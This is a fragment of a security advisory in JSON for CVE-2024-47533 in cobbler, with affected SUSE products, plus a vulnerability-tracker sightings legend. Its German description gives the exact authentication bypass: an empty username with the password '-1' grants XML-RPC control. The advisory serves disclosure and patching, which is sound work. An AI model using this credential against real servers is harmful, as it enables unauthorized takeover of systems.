"cpe": "cpe:/o:suse:opensuse:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-47533",
"notes": [
{
"category": "description",
"text": "Es existiert eine Schwachstelle in cobbler, aufgrund eines Fehlers in der Authentifizierung. \"utils.get_shared_secret()\" gibt immer den Wert \"-1\" zur\u00fcck, was jedem erlaubt, sich mit cobbler XML-RPC als Benutzer \"\" Passwort \"-1\" zu verbinden und \u00c4nderungen vorzunehmen. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um die volle Kontrolle \u00fcber den Server zu erlangen."
}
],
"product_status": {
"known_affected": [
"T039241",
"T039242",
"T027843",
"T039239"
]
},
"release_date": "2024-11-18T23:00:00.000+00:00",
"title": "CVE-2024-47533"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…